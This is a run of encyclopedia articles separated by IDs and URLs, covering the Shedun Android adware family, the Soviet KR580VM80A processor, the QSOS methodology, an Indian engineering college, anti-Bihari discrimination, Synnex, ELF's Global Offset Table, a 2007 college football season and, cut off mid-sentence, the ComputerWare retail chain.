Diane Pamela Wood, the first female chief judge of the United States Court of Appeals for the Seventh Circuit, astrophysicist Neil deGrasse Tyson, chemist Donna J. Nelson, and neuroscientist Tara Spires-Jones. Also an alumnus is Admiral William H. McRaven, credited for organizing and executing Operation Neptune's Spear, the special ops raid that led to the death of Osama bin Laden. Oveta Culp Hobby, the first woman to earn the rank of a colonel in the United States Army, first commanding officer and director of the Women's Army Corps, first secretary of the Department of Health, Education, and Welfare attended the university as well. Keene Prize for Literature The Keene Prize for Literature is a student literary award given by the university. With a prize of $50,000, it claims to be "one of the world's largest student literary prizes". An additional $50,000 is split between three finalists. The purpose of the award is to "help maintain the university's status as a premier location for emerging writers", and to recognize the winners and their works. The prize was established in 2006, in the College of Liberal Arts. It is named after E. L. Keene, a 1942 graduate of the university. See also ArchNet – A joint project between the university and MIT on Islamic architecture Cactus Cafe Institute for Computational Engineering and Sciences List of University of Texas at Austin presidents Silicon Hills University of Texas at Austin High School University of Texas at Austin admissions controversy University of Texas Elementary School University of Texas Sailing Team References Notes External links University of Texas at Austin Athletics website 1883 establishments in Texas Educational institutions established in 1883 Flagship universities in the United States Tourist attractions in Austin, Texas Universities and colleges accredited by the Southern Association of Colleges and Schools Universities and colleges in Austin, Texas University of Texas Austin Austin
50084266
https://en.wikipedia.org/wiki/Shedun
Shedun
Shedun is a family of malware software (also known as Kemoge, Shiftybug and Shuanet) targeting the Android operating system first identified in late 2015 by mobile security company Lookout, affecting roughly 20,000 popular Android applications. Lookout claimed the HummingBad malware was also a part of the Shedun family, however, these claims were refuted. Avira Protection Labs stated that Shedun family malware is detected to cause approximately 1500-2000 infections per day. All three variants of the virus are known to share roughly ~80% of the same source code. In mid 2016, arstechnica reported that approximately 10.000.000 devices would be infected by this malware and that new infections would still be surging. The malware's primary attack vector is repackaging legitimate Android applications (e.g. Facebook, Twitter, WhatsApp, Candy Crush, Google Now, Snapchat) with adware included. The app which remains functional is then released to a third party app store; once downloaded, the application generates revenue by serving ads (estimated to amount to $2 US per installation), most users cannot get rid of the virus without getting a new device, as the only other way to get rid of the malware is to root affected devices and re-flash a custom ROM. In addition, Shedun-type malware has been detected pre-installed on 26 different types of Chinese Android-based hardware such as Smartphones and Tablet computers. Shedun-family malware is known for auto-rooting the Android OS using well-known exploits like ExynosAbuse, Memexploit and Framaroot (causing a potential privilege escalation) and for serving trojanized adware and installing themselves within the system partition of the operating system, so that not even a factory reset can remove the malware from infected devices. Shedun malware is known for targeting the Android Accessibility Service, as well as for downloading and installing arbitrary applications (usually adware) without permission. It is classified as "aggressive adware" for installing potentially unwanted program applications and serving ads. As of April 2016, Shedun malware is considered by most security researchers to be next to impossible to entirely remove. Avira Security researcher Pavel Ponomariov, who specializes in Android malware detection tools, mobile threat detection, and mobile malware detection automation research, has published an in-depth analysis of this malware. See also Brain Test Dendroid (Malware) Computer virus File binder Individual mobility Malware Trojan horse (computing) Worm (computing) Mobile operating system References Software distribution Trojan horses Social engineering (computer security) Rootkits Privilege escalation exploits Adware Online advertising Android (operating system) malware Mobile security Spyware Privacy
11801329
https://en.wikipedia.org/wiki/KR580VM80A
KR580VM80A
The KR580VM80A () is a Soviet microprocessor, a clone of the Intel 8080 CPU. Different versions of this CPU were manufactured beginning in the late 1970s, the earliest known use being in the SM1800 computer in 1979. Initially called the K580IK80 (К580ИК80), it was produced in a 48-pin planar metal-ceramic package. Later, a version in a PDIP-40 package was produced and was named the KR580IK80A (КР580ИК80А). The pin layout of the latter completely matched that of Intel's 8080A CPU. In 1986 this CPU received a new part number to conform with the 1980 Soviet integrated circuit designation and became known as the KR580VM80A (КР580ВМ80А), the number it is most widely known by today (the KR580VV51A and KR580VV55A peripheral devices went through similar revisions). Normal clock frequency for the K580IK80A is 2 MHz, with speeds up to 2.5 MHz for the KR580VM80A. The KR580IK80A was manufactured in a 6 µm process. In the later KR580VM80A the feature size was reduced to 5 µm and the die became 20% smaller. Technology and support chips The KR580VM80A was manufactured with an n-MOS process. The pins were electrically compatible with TTL logic levels. The load capacity of each output pin was sufficient for one TTL input. The output capacitance of each control and data pins was ≤ 100pF each. The family consists of the following chips: For brevity, the table above lists only the chip variants in a plastic DIP (prefix КР) as well as the original planar package (prefix К). Not listed separately are variants in a ceramic DIP (prefix КМ for commercial version and prefix М or no prefix for the military version) or export variants (prefix ЭКР) in a plastic DIP but with a pin spacing of one tenth of an inch. For the KR580VM1 (КР580ВМ1) see Further development below. Several integrated circuits in the K580 series were actually intended for other microprocessor families: the KR580VR43 (КР580ВР43 — Intel 8243) for the K1816 family (Intel MCS-48) and the KR580GF84 (КР580ГФ84 — Intel 8284) / KR580VG88 (КР580ВГ88 — Intel 8288) / KR580VB89 (КР580ВБ89 — Intel 8289) for the K1810 family (Intel 8086). Additionally, most devices in the K580 series could be used for the K1810 series as well. KR580VM80A vs. Intel 8080A While the Soviet clone appears to be fully software-compatible with Intel 8080A, there is a slight difference between the two processors' interrupt handling logic, which looks like an error in the KR580VM80A's microcode. If a CALL instruction opcode is supplied during INTA cycle and the INT input remains asserted, the KR580VM80A does not clear its internal Interrupt Enable flag, despite the INTE output going inactive. As a result, the CPU enters a microcode loop, continuously acknowledging the interrupt and pushing the PC onto the stack, which leads to stack overflow. In a typical hardware configuration this phenomenon is masked by the behavior of 8259A interrupt controller, which deasserts INT during INTA cycle. The Romanian MMN8080 behaves the same as the KR580VM80A; no other 8080A clones seem to be affected by this error. Applications The KR580VM80A was popular in home computers, computer terminals, industrial controllers. Some of the examples of its successful application are: KUVT Korvet educational computer Radio-86RK (Радио 86РК), probably the most popular amateur single-board computer in the Soviet Union Micro-80 (Микро-80 in Russian), Radio 86RK's predecessor Orion-128 (Орион-128 in Russian), Radio 86RK's successor, which had a graphical display Specialist (computer), similar to Orion-128 SM 1800 industrial mini computer Vector-06C home computer, where KR580VM80A is overclocked to 3 MHz by design TIA-MC-1 (ТИА-МЦ-1) arcade machine Juku ES101 educational computer designed in Estonia Maestro (Маэстро) soviet four voice hybrid analog synthesizer keyboard Further development Mirroring the development in the West, where the Intel 8080 was succeeded by the binary compatible Intel 8085 and Zilog Z80 as well as the source compatible Intel 8086, the Soviet Union produced the IM1821VM85A (ИМ1821ВМ85А, actually the CMOS version Intel 80C85), KR1858VM1 (КР1858ВМ1), and K1810VM86 (К1810ВМ86), respectively. The 580VM80 is still shown on the price list of 1 July 2020 of the "Kvazar" plant in Kyiv together with various support chips of the K580 series. Another development, the KR580VM1 (КР580ВМ1), has no western equivalent. The KR580VM1 extends the Intel 8080 architecture and is binary compatible with it. The extensions differ, however, from both the Intel 8085 and the Zilog Z80. The KR580VM1 extends the address range from 64KB to 128KB. It adds two registers, H1 and L1, that can be used instead of H and L. Several 16-bit arithmetic instructions were added as well (DAD, DSUB, DCOMP). Just like the Intel 8085 and the Zilog Z80, the KR580VM1 needs only a single +5V power supply instead of the three voltages required by the KR580VM80A. The maximum clock frequency was increased from 2 MHz to 5 MHz while the power consumption was reduced from 1.35W to 0.5W, compared to the KR580VM80A. See also Intel 8080 MCS-85 Family List of Soviet computer systems Soviet integrated circuit designation References External links CPU World page about KR580VM80A Reverse-engineering of KR580VM80A Computer-related introductions in 1979 Computing in the Soviet Union 8-bit microprocessors
5868484
https://en.wikipedia.org/wiki/QSOS
QSOS
The Qualification and Selection of Open Source software (QSOS) is a methodology for assessing Free/Libre Open Source Software. This methodology is released under the GFDL license. General approach QSOS defines 4 steps that are part of an iterative process: 1 - Define and organise what will be assessed (common Open Source criteria and risks and technical domain specific functionalities), 2 - Assess the competing software against the criteria defined above and score these criteria individually, 3 - Qualify your evaluation by organising criteria into evaluation axes, and defining filtering (weightings, etc.) related to your context, 4 - Select the appropriate OSS by scoring all competing software using the filtering system designed in step 3. Output documents This process generates software assessing sheets as well as comparison grids. These comparison grids eventually assist the user to choose the right software depending on the context. These documents are also released under the free GNU FDL License. This allows them to be reused and improved as well as to remain more objective. Assessment sheets are stored using an XML-based format. Tools Several tools distributed under the GPL license are provided to help users manipulate QSOS documents: Template editor: QSOS XUL Template Editor Assessment sheets editors: QSOS XUL Editor QSOS Qt Editor QSOS Java Editor (under development) See also Open source software assessment methodologies Open Source Software Free Software External links Official QSOS website Community website for the QSOS project Free software culture and documents Maturity models
2369152
https://en.wikipedia.org/wiki/Pune%20Institute%20of%20Computer%20Technology
Pune Institute of Computer Technology
Pune Institute of Computer Technology, (or PICT) is a private unaided engineering college located in Dhankawadi, Pune, India. Established by the Society for Computer Technology and Research, SCTR in 1983. It offers degrees in Information Technology, Computer Engineering and Electronics and Telecommunication Engineering. Accreditation PICT was accredited by India's two major accreditation agencies - National Assessment and Accreditation Council [NAAC] and National Board of Accreditation [NBA]. Specializations and departments Computer Engineering Head of Department: M. S. TAKLIKAR Undergraduate intake per year: 240 Postgraduate intake per year: 52 The Bachelor of Engineering Program in Computer Engineering commenced from the academic year 1983–84. The Department is known for its excellent results and student placements. There are 10 well-equipped laboratories in the department. The Department has been pioneered as the first Post Graduate Department in Computer Engineering in the unaided Engineering Colleges in University of Pune; with first batch commencing in year 2000. There are two shifts in this program, first consisting of 180 students and the other 60 students. Electronics and Telecommunication Engineering Head of Department: Sandeep V. Gayakwaad Undergraduate intake per year: 240 This program also consists of two shifts, consisting of 180 students in first shift and 60 students in second shift. Established in 1995, this department has a lab with around 25 Texas and Motorola experimental kits. The E&TC department has won the "Best Department Award" in 2003 and 2004. In 2009–2010, the E&TC department had the highest MHT-CET cut-off in University of Pune of 178/200. Information Technology Engineering Head of Department: A. M. Bagade Undergraduate intake per year: 180 PICT's Bachelor of Engineering Program in Information Technology began in 2001 with an intake capacity of 60 students. The current intake capacity is 180 students. It has a multimedia laboratory, operating system Laboratory and network laboratory along with the programming and project laboratories. Degrees awarded The Bachelor of Engineering(B.E) degree is offered in all the aforementioned departments. ME degree is also offered by all departments. As PICT is affiliated with the University of Pune, the degrees are offered by the university. Admissions The institute considers the MHT-CET and JEE-Main scores of students for admissions. Also students successfully completing Diploma from polytechnic institutes are eligible for admissions to direct second year. It is considered one of the most selective institutes to get into. There are also programs for students of non-residential Indians ([Non-resident Indian and person of Indian origin|NRIs]) in the college. Campus and buildings The campus is located in Dhankawadi, a suburb of southern Pune. It is a totally urban campus. The hallmark of the 4 acre campus is the central sprawling lawn in front of main library, which is off limits to all the students and teachers. The buildings in the campus are: Main building School of Management Canteen Boys hostel Girls hostel Workshop Guest House Main Building The main building is the largest building on the campus. It consists of the administrative wing, Computer Engineering wing, Electronics and Telecommunication wing, IT wing and the main library. The building has classrooms, laboratories and staff rooms which are shared between the three undergraduate courses. The PICT library has a collection of books and subscriptions to journals. The library is accessible from 6 AM to 10 PM to students and is centrally located between the three academic wings. The whole of the Main Building has seamless Wi-Fi connectivity except the Lecture Hall Complex. The boys and girls hostel have a combined capacity of 200 students and are located on the north of the campus. All the Hostels have LAN facilities, which facilitate seamless learning. The cafeteria serving mostly Indian cuisine is situated between the two hostels. The PICT basketball court is situated adjacent to the girls hostel building. Also there is a Student Activity Center(SAC) which has facilities for student recreation. Extra-Curricular Activities Apart from academics, annual technical and cultural festivals are held such as, Impetus and concepts (INC 2014) PICT Robotics TEDxPICT Credenz - PICT IEEE Student Branch organized Scientia - PICT IET Student Chapter Pulzion - PICT ACM Student Chapter Abhivyaktee and Art Exhibition - PICT Art Circle. Cultural show by FE students. Addiction - Annual Cultural festival. Impetus and Concepts, popularly known as INC, was initiated in 1990 and soon reached a stage where it created national and international interest. It won acclaim and industry stalwarts with vision recognized its importance and actively supported the event. Concepts is a national-level project competition, having students participating from colleges all over the country. Apart from technical events PICT's annual cultural event, ADDICTION, also takes place during the month of January. PICT Art Circle With a Record of winning Best Organized Team 11 times, PICT Art Circle is an official Cultural group of PICT that represents college at various Cultural Events such as Mood Indigo and participates in Intercollegiate competitions such as Purushottam Karandak, Firodiya Karandak and Dajikaka Gadgil Karandak etc. PICT has won Purushottam Karandak in 2000 and 2015 along with numerous prizes. Recently it has shown exemplary performance at Firodiya Karandak 2019 winning the 2nd Runner Up Position for one act play 'Naqaab' in the same for the 3rd Time along with awards such as Best Writer, Actor, Set etc. and Best Organized Team, previously in 2005 and 2017. Sports Basket Ball , Volley Ball , Table Tennis, Football Rankings PICT was ranked 8th on the list of best Engineering College of India by the Edu-Rand Rankings in 2016. The survey was done jointly by Edu, an Indian company and Rand Corporation, a non-profit American thinktank. References External links Official website Review of PICT by students Inspection of Affiliated Collegeshttp://sppudocs.unipune.ac.in/sites/circulars/Affiliation%20Circulars/regarding-overall-deficiencies-and-observation-11-12-15.pdf Engineering colleges in Pune Savitribai Phule Pune University Educational institutions established in 1983 1983 establishments in Maharashtra mr:पुणे इन्स्टीत्यूट ऑफ कॉम्पुटर टेक्नोलॉजी
18982645
https://en.wikipedia.org/wiki/Anti-Bihari%20sentiment
Anti-Bihari sentiment
Anti-Bihari sentiment refers to discrimination against the migrant people of the Indian state of Bihar which is a state in the north-eastern Gangetic plains of the country. Bihar had slower economic growth than the rest of India in the 1990s which led to Biharis migrating to other parts of India in search of opportunities. Bihari migrant workers have been subject to a growing degree of hatred by the locals of those states because of their stereotyping as criminals. Moreover, the Biharis have been victimized due to the growing anti-Hindi imposition sentiment in non-Hindi states owing to the Central government agencies excluding regional languages in many national exams and services. Causes Since the late 1980s and through to 2005, poor governance and annual flooding of Bihar by the Kosi River (Sorrow of Bihar) contributed to a crisis in the Bihar economy. Corruption in regional politics and kidnappings of professional workers between 1990 and 2005 who spoke against the corruption contributed to an economic collapse and led to the flight of capital, middle class professionals, and business leaders to other parts of India. This flight of business and capital increased unemployment and this led to the mass migration of Bihari farmers and unemployed youth to more developed states of India. The state has a per capita income of $536 a year against India's average of $1470 and 30.6% of the state's population lives below the poverty line against India's average of 22.15%. The level of urbanisation (10.5%) is below the national average (27.78%). Urban poverty in Bihar (32.91%) is above the national average of 23.62%. Bihar has highest population density and lowest GDP in India. Also using per capita water supply as a surrogate variable, Bihar (61 litres per day) is below the national average (142 litres per day). Impact Economic Bihar has a per capita income of $536 a year against India's average of $1,470. Given this income disparity, migrant workers moved to better paid locations and offered to work at lower rates. For example, in Tamil Nadu inter-state migrant construction workers are paid about Rs. 300 to Rs. 400 a day against the minimum of Rs. 750 per day. After thousands of migrant workers left Nashik, industries were worried that their costs would increase through more expensive local workers. In an interview with the Times of India, Raj Thackeray, leader of the MNS said; "The city (Mumbai) cannot take the burden anymore. Look at our roads, our trains and parks. On the pipes that bring water to Mumbai are 40,000 huts. It is a security hazard. The footpaths too have been taken over by migrants. The message has to go to Bihar that there is no space left in Mumbai for you. After destroying the city, the migrants will go back to their villages. But where will we go then?". The strain to Mumbai's infrastructure through migration has also been commented by mainstream secular politicians. The Chief Minister, Vilasrao Deshmukh felt that unchecked migration had placed a strain on the basic infrastructure of the state. However, he has maintained and urged migrant Bihari workers to remain in Maharashtra, even during the height of the anti North Indian agitation. Sheila Dikshit, the Chief Minister of Delhi, said that because of people migrating from Bihar, Delhi's infrastructure was overburdened. She said, that "these people come to Delhi from Bihar but don't ever go back causing burden on Delhi's infrastructure." Violence India Maharashtra North Indian students, including students from Bihar, preparing for the railway entrance exam were attacked by supporters of Raj Thackeray's far right MNS party in Mumbai on 20 October 2008. One student from Bihar was killed during the attacks. Four people were killed and another seriously injured in the violence that broke out in a village near Kalyan following the arrest of MNS chief Raj Thackeray. Bihar Chief Minister Nitish Kumar demanded action against the Maharashtra Navnirman Sena activists and full security to students. Nitish Kumar requested Maharashtra Chief Minister Vilasrao Deshmukh intervention. Kumar directed the additional director general of police to contact senior police officials in Maharashtra and compile a report on Sunday's incident and asked the home commissioner to hold talks with the Maharashtra home secretary to seek protection for people from Bihar. In 2003, the Shiv Sena alleged that of the 500 Maharashtrian candidates, only ten of them successful in the Railways exams. 90 per cent of the successful candidates were alleged to be from Bihar. Activists from the Shiv Sena ransacked a railway recruitment office in protest against non-Marathi's being among the 650,000 candidates set to compete for 2,200 railway jobs in the state. Eventually, after attacks on Biharis heading towards Mumbai for exams, the central government delayed the exams. Here it is noteworthy that leaders from Bihar including Lalu Prasad Yadav and Ram Vilas Paswan were the Minister for Railways for a long time. Raj Thackeray alleged that there was a preference for the North Indian candidates by these ministers. He also lauded the next Railway minister Mamata Banerjee for including regional languages in the Railway Recruitment Board exams allowing a level playing field for Marathis and other non-Hindi speakers. North East states Biharis have sought work in many states that form part of North East India. There were significant communities in Assam, Nagaland, and Manipur. Biharis who come to work as labourers are frequently and especially targeted in Assam by ULFA militants. There is a fear amongst the local population that Bihari migrants will dominate and annihilate the regional culture and the language. As with all migrations in history, this has created tensions with the local population, which has resulted in large scale violence. In 2000 and 2003, anti-Bihari violence led to the deaths of up to 200 people, and created 10,000 internal refugees. Similar violent incidents have also taken place recently in Manipur and Assam. According to K P S Gill waves of xenophobic violence have swept across Assam repeatedly since 1979, targeting Bangladeshis, Bengalis, Biharis and Marwaris. Rajasthan On 13 May 2016, a student named Satyarth was beaten to death and another student was injured in an incident that occurred in Kota, Rajasthan. Regarding the event BJP MLA Bhawani Singh Rajawat of Kota stated that "Students from Bihar, UP and Jharkhand are spoiling the atmosphere of city and they must be driven out of the city." The government in Rajasthan assured full protection to students from Bihar, after ragging incidents of Bihari students in a private engineering college in Udaipur surfaced. Lalu Prasad Yadav and Ram Vilas Paswan flayed the attacks on Bihari students in Rajasthan saying that the students were subjected to insult, torture and assaulted with sticks when they protested. Former chief minister Rabri Devi called upon the chief minister to take necessary action and assure the safety of the students. According to reports, several Bihari students were thrashed during the ragging. Gujarat In October 2018, there were incidents of attacks on Hindi-speaking migrants in Gujarat after the alleged rape of a 14-month-old in a village near Himmatnagar in north Gujarat by a Bihari. The attacks triggered the exodus of the migrants. Controversial statements Editorial by Bal Thackeray Shiv Sena leader, Bal Thackeray, commented in the Shiv Sena newspaper, Samnna on why Biharis are disliked outside eastern states. He quoted part of a text message as the title of his article. The message suggests that Biharis bring diseases, violence, job insecurity, and domination, wherever they go. The text message says, "Ek Bihari, Sau Bimari. Do Bihari Ladai ki taiyari, Teen Bihari train hamari and paanch Bihari to sarkar hamaari" (One Bihari equals hundred diseases, Two Biharis is preparing for fight, Three Biharis it is a train hijack, and five Biharis will try to form the ruling Government). Nitish kumar, the Chief Minister of Bihar, and the Union Railway Minister, Lalu Prasad Yadav, protested against the remark, demanding official condemnation of Bal Thackeray. Kumar, during a press report at Patna Airport, said, "If Manmohan Singh fails to intervene in what is happening in Maharashtra, it would mean only one thing – he is not interested in resolving the issue and that would not be good for the leader of the nation". Angered by Thackeray's insulting remark against the Bihari community, Rashtriya Janata Dal (RJD) activists burned the effigy of the Shiv Sena chief at Kargil Chowk in Patna and said that the senior Thackeray had completely lost his marbles and needed to be immediately committed in a mental asylum. Consequences Protests and demonstrations Angry students in various parts of Bihar disrupted train traffic, as protests continued against assaults on north Indians by MNS activists in Mumbai. Noted Physician Dr Diwakar Tejaswi observed a day-long fast in Patna to protest against repeated violence by the Maharashtra Navnirman Sena (MNS) leader Raj Thackeray and his supporters against the north Indians who are responsible for various criminal activities. Various student organisations gave a call for Bihar shutdown on 25 October 2008 to protest attacks on north Indian candidates by Maharashtra Navnirnam Sena activists during a Railway recruitment examination in Mumbai. Various cases were filed in Bihar and Jharkhand against Raj Thackeray for assaulting the students. A murder case was also filed by Jagdish Prasad, father of Pawan Kumar, who was allegedly killed by MNS activists in Mumbai. Mumbai police, however, claimed it to be a case of accident. Bihar Chief Minister Nitish Kumar announced a compensation of Rs 1,50,000 to Pawan's family. Bihar state Congress chief, Anil Kumar Sharma, has demanded enactment of an Act by Parliament for closing opportunities to any political party or organisation that indulge in obscurantism and raise such narrow, chauvinistic issues based on regionalism to capture power. A murder case was also lodged against Raj Thackeray and 15 others in a court in Jharkhand on 1 November 2008 following the death of a train passenger last month in Maharashtra. According to the Dhanbad police, their Mumbai counterparts termed Sakaldeo's death as an accident. According to social scientist Dr. Shaibal Gupta, the beating of students from Bihar has consolidated Bihari sub-nationalism. Rahul Raj Rahul Raj, from Patna, was shot dead aboard a bus in Mumbai by the police on 27 October 2008. Rahul was 23 years old and was brandishing a pistol and not shooting at public but a major threat to public security. The Mumbai police alleged that he wanted to assassinate Raj Thackeray. Nitish Kumar questioned the police action, but R R Patil justified it, and restored public security. It was alleged that Rahul was protesting against the attacks on Bihari and Uttar Pradeshi candidates appearing for railway examinations. Mumbai crime branch is looking into the incident. During Rahul's funeral slogans of "Raj Thackeray murdabad" and "Rahul Raj amar rahe" were heard. Despite Mumbai police's allegations, there was high level government representation at the funeral. Bihar Deputy CM Sushil Kumar Modi and PHED minister Ashwini Kumar Chaubey represented the state government at the cremation which was also attended by Patna MP Ram Kripal Yadav. The bier was carried by Rahul's friends even as the district administration had arranged a flower-bedecked truck for the purpose. Attacks against Marathis After the October 2008 anti-Bihari attacks in Maharashtra, members of the Bharatiya Bhojpuri Sangh (BBS) vandalised the official residence of Tata Motors Jamshedpur plant head S.B. Borwankar, a Maharashtrian. Armed with lathis and hockey sticks, more than 100 BBS members trooped to Borwankar's Nildih Road bungalow around 3.30 pm. Shouting anti-MNS slogans, they smashed windowpanes and broke flowerpots. BBS president Anand Bihari Dubey called the attack on Borwankar's residence unfortunate, and said that he knew BBS members were angry after the attack in Maharashtra on Biharis, but did not expect a reaction. Fear of further violence gripped the 4,000-odd Maharashtrians settlers living in and around the city. Two air-conditioned bogies of the train Vikramshila Express – reportedly with Maharashtrian passengers on board – were set on fire in Barh area of Bihar. Hundreds of slogan-shouting students surrounded Barh railway station in rural Patna demanding that MNS leader Raj Thackeray be tried for sedition. No one was reported injured and passengers fled soon as the attackers started setting the bogies on fire. In another incident, a senior woman government official in Bihar, with the surname Thackeray, was the target of an angry mob that surrounded her office and shouted slogans against her in Purnia district. Ashwini Dattarey Thackeray was the target of a mob of over 200 people. The mob, led by a local leader of the Lok Janashakti Party, surrounded Thackeray's office in Purnia, about 350 km from here, and shouted slogans like, "Go back Maharashtrians" and "Officer go back, we do not need your services". A gang of 25 people pelted stones on the Maharashtra Bhawan in Khalasi Line, Kanpur, Uttar Pradesh. Constructed in 1928, the building is owned by the lone trust run by Marathis in Kanpur. It has served as an important venue for prominent festivals, including Ganesh Utsav and Krishna Janmastami. On 29 October, in Ghaziabad, Marathi students at Mahanand Mission Harijan PG College were attacked, allegedly by an Uttar Pradesh student leader and his friends. Police sources in Ghaziabad confirmed the victims stated in their FIR that the attackers "mentioned Rahul Raj and Dharam Dev" while kicking them in their hostel rooms. A group of 20 youths, from Bihar, attacked Maharashtra Sadan in the capital on 3 November. The Rashtrawadi Sena has claimed responsibility for the attack. They ransacked the reception of the building and raised slogans against Raj Thackeray. Bhojpuri film industry relocation The Rs 200-crore Bhojpuri film industry is considering moving out of Mumbai owing to threats from MNS workers, and growing insecurity. With an average output of 75 movies per annum and an over 250 million target audience, the Bhojpuri film industry employs hundreds of unskilled and semi-skilled people from the state in various stage of production and distribution. The industry, which has around 50 registered production houses in Mumbai, has initiated talks with Uttar Pradesh and Bihar. "We have given a proposal to the Uttar Pradesh government through its Culture Minister Subhash Pandey for setting up the industry in Lucknow. Besides, we are also counting on some other options like Delhi, Noida and Patna," Bhojpuri superstar and producer Manoj Tiwari said. The films have a large market because the Bhojpuri diaspora is spread over countries like Mauritius, Nepal, Dubai, Guyana, West Indies, Fiji, Indonesia, Surinam and the Netherlands. 70 per cent of the total production cost of a Bhojpuri film — budgets of which range from Rs 80 lakh to Rs 1.25 crore — is usually spent in Maharashtra, providing direct employment to junior artists, make-up men, spot boys and local studios among others. Improving Bihar However, the state government, post 2005, has made an effort to improve the economic condition of the state, and reduce the need for migration. In 2008, the state government approved over Rs 70,000 crore worth of investment, has had record tax collection, broken the political-criminal nexus, made improvements in power supply to villages, towns and cities. Bihar, a state fraught with abject poverty, has come out on top as the fastest growing state second year in a row, with a striking 13.1 percent growth in 2011–2012. Its economy has also grown bigger than that of Punjab — the prime destination for Bihari workers. They have laid greater emphasis on education and learning by appointing more teachers, and opening a software park. State Ministers who have failed to live up to election commitments have been dismissed. Bihar's GSDP grew by 18% over the period 2006–2007, which was higher than in the past 10 years and one of the highest recorded by the Government of India for that period. Other consequences Since November 2005, there has been a significant fall in the number of migrant workers in many parts of India. After the early 2008 migrant crisis and bombing of the Bhojpuri cinema hall in Punjab, Biharis have decided to stay away from states of the North East and Punjab. Culturally, Biharis appear to have rejected a film based heavily on Punjabi culture. In August 2008, a film called Singh Is Kinng starring Akshay Kumar which was a superhit in India, flopped in Bihar. Bihar has been where Akshay Kumar's films, from Jaanwar to Hey Babyy, have acquired a blockbuster status. In this case, the heavy usage of Punjabi language, culture was said to be the main cause of the movie being rejected by Bihari audiences. See also 2008 attacks on North Indians in Maharashtra Anti-India sentiment Permanent Settlement Ethnic relations in India References Discrimination in India Muhajir history Racism in India
11503950
https://en.wikipedia.org/wiki/Synnex
Synnex
Synnex Corporation is an American multinational corporation that provides B2B IT services. It was founded in 1980 by Robert T. Huang and based in Fremont, California. As an information technology supply chain services company, it offers services to original equipment manufacturers, software publishers and reseller customers. History Originally founded as a technology hardware distributor, Synnex distributes products and related logistics services. As a business process outsourcing and contract assembly it works with industry suppliers of IT systems, peripherals, system components, software and networking equipment. The company is one of the major employers in Greenville, South Carolina. On 21 December 2009, Synnex acquired Jack of All Games from Take-Two Interactive. In December 2010 Synnex acquired the managed business solutions division of e4e, an ITes service provider located in Bangalore in India. In 2012 Hyve Solutions announced a partnership with IBM and Zettaset to produce a bundled "turnkey" platform for Hadoop-based analytics targeted to the needs of small- and medium-sized businesses. Synnex acquired IBM's worldwide customer care business process outsourcing (BPO) services business on 11 September 2013. On 28 June 2018, Convergys and Synnex announced they have reached a definitive agreement in which Synnex would acquire Convergys for $2.43 billion in combined stock and cash, and integrate it with Concentrix. On 5 October 2018, Convergys Corporation and Synnex announced that they have completed the merger. In 2019, Synnex sits at number 158 on the Fortune 500 listing. On 9 January 2020, Dennis Polk, President and Chief Executive Officer of Synnex, announced plans to separate SYNNEX and Concentrix into two publicly traded companies. The spinoff was completed on 1 December 2020, with Synnex shareholders getting one share of Concentrix for each share of Synnex they held. In July 2020, the Republican National Convention's servers were hacked through Synnex. The company said it "could potentially be in connection" with the Kaseya VSA ransomware attack that unfolded days prior. On 22 March 2021 it was announced that Synnex will merge with Tech Data for a sum of 7.2 billion USD, including debt. Synnex shareholders receive 55% of the merged company. MiTAC Holdings Corp. and its affiliates, which collectively owns about 17% of Synnex shares as of 22 January 2021, have agreed to vote their shares in favor of the transaction. Merger with Tech Data On September 1, 2021, Synnex completed a merger with Tech Data. This merger created a new company with $59.8 billion in revenue, TD Synnex. Through the combination of both companies, TD Synnex becomes the largest IT distributor, surpassing Ingram Micro. TD Synnex is led by former Tech Data CEO, Rich Hume. References Companies listed on the New York Stock Exchange Consulting firms established in 1980 Companies based in Fremont, California Information technology consulting firms of the United States International information technology consulting firms Outsourcing companies American companies established in 1980 Technology companies established in 1980 2021 mergers and acquisitions
53931502
https://en.wikipedia.org/wiki/Global%20Offset%20Table
Global Offset Table
The Global Offset Table, or GOT, is a section of a computer program's (executables and shared libraries) memory used to enable computer program code compiled as an ELF file to run correctly, independent of the memory address where the program's code or data is loaded at runtime. It maps symbols in programming code to their corresponding absolute memory addresses to facilitate Position Independent Code (PIC) and Position Independent Executables (PIE) which are loaded to a different memory address each time the program is started. The runtime memory address, also known as absolute memory address of variables and functions is unknown before the program is started when PIC or PIE code is run so cannot be hardcoded during compilation by a compiler. The Global Offset Table is represented as the .got and .got.plt sections in an ELF file which are loaded into the program's memory at startup. The operating system's dynamic linker updates the global offset table relocations (symbol to absolute memory addresses) at program startup or as symbols are accessed. It is the mechanism that allows shared libraries (.so) to be relocated to a different memory address at startup and avoid memory address conflicts with the main program or other shared libraries, and to harden computer program code from exploitation. References Computer programming
25764801
https://en.wikipedia.org/wiki/2007%20Troy%20Trojans%20football%20team
2007 Troy Trojans football team
The 2007 Troy Trojans football team represented Troy University in the 2007 NCAA Division I FBS football season. The Trojans played their home games at Movie Gallery Stadium in Troy, Alabama and competed in the Sun Belt Conference. The Trojans were co-champions of the conference with Florida Atlantic, winning their second title in a row. Troy was coming off an 8–5 record in 2006. Schedule Rankings Coaching staff Larry Blakeney – Head Coach Shayne Wasden – Assistant Head Coach Tony Franklin – Offensive Coordinator/Quarterbacks Jeremy Rowell – Defensive Coordinator/Secondary Randy Butler – Defensive Ends/Recruiting Coordinator Maurea Crain – Defensive Line Neal Brown – Inside Receivers Benjy Parker – Linebackers John Schlarman – Offensive Line Chad Scott – Running Backs Richard Shaughnessy – Strength and Conditioning References Troy Trojans Troy Trojans football seasons Sun Belt Conference football champion seasons Troy Trojans football
11259524
https://en.wikipedia.org/wiki/ComputerWare
ComputerWare
ComputerWare: The MacSource was a chain of ten Macintosh-only retail stores in the greater San Francisco Bay Area of Northern California founded by Karim Khashoggi and Drew Munster. At one time, they were the largest Macintosh-only reseller in the United States. Guy Kawasaki mentions ComputerWare a number of times in his book, The Macintosh Way. Besides the ten stores, ComputerWare also had a headquarters that held international, direct, and corporate sales departments, and at one time had a full hardware repair depot and various training centers on the Bay Area. History The first ComputerWare store was opened on California Avenue in Palo Alto in 1985 by Drew Munster and Karim Khashoggi. They later hired Derek Van Atta as store manager. ComputerWare was originally incorporated as Lightning Development, doing business as ComputerWare; later the corporation was reorganized as ComputerWest dba ComputerWare after David Lipson bought the company from the original founders. The Corporate Sales department was formed in 1987. In 1988 a separate Headquarters was set up at 2800 West Bayshore Avenue in Palo Alto to house administrative, hardware repair, Corporate Sales, and other departments that were out-growing the floor above the Palo Alto retail storefront. In May 1989, ComputerWare expanded to two stores with the opening of their Sunnyvale store on Lawrence Expressway near Fry's Electronics. Then three more stores were opened in rapid succession: the San Francisco store was opened in November in the 